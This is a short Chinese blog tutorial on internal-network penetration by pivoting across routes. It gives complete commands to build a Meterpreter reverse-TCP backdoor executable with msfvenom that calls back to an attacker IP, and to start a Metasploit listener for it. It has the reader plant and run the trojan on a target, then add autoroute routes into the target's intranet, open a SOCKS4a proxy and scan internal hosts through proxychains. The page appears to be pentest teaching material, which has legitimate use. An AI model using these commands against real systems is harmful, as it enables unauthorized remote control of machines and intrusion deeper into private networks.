内网渗透思路03之跨路由扫描

在这里插入图片描述

生成metasploit后门

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.196  lport=12345 -f exe >/var/www/html/s.exe

kali监听

use exploit/multi/handler

set payload  windows/meterpreter/reverse_tcp

set lhost 192.168.0.196

set lport 12345

exploit

手动上传木马文件到目标机器,并执行。

msf绘画中常用命令

查看当前用户					getuid


进入cmd交互shell界面			Shell

Systeminfo					//在cmd交互shell下执行,显示目标系统信息。

获取网卡信息					ifconfig

路由信息

run get_local_subnets		//可以用此命令查看目标机器所在内网网端信息与公网网端信息。

在这里插入图片描述

增加路由

run autoroute -s 10.10.10.0/24

//添加一条通向目标服务器内网的路由,即让目标路由分配给当前kali一个内网IP。

//此时,msf就可以直接访问目标内网中其他机器。

run autoroute –p

//查看有没有新增成功,下图这种出现结果即表明新增成功。

在这里插入图片描述

Background

//返回,把meterpreter后台挂起

开启socks 4代理

use auxiliary/server/socks4a

// 让Metasploit可以作为一个SOCKS代理服务器

Set srvport 10044		//设置服务端口

在这里插入图片描述

修改本机kali的网络配置文件

/etc/prxoychains.conf

在这里插入图片描述

扫描/访问内网其他机器

新开一个窗口扫描端口服务,扫描内网中其他机器端口开放情况。

在这里插入图片描述

扫描到80端口开放;另外这个速度有一点慢。

采用tcp扫描,禁止ping操作。

也可以扫描一些其他常用端口:
在这里插入图片描述

如果全是timeout那么就应该思考一下,是不是配置出错。

如msf里端口,或者/etc/prxoychains.conf文件内容不对。

也可以用proxychains代理火狐访问一些其他内网机器
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

划水的小白白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值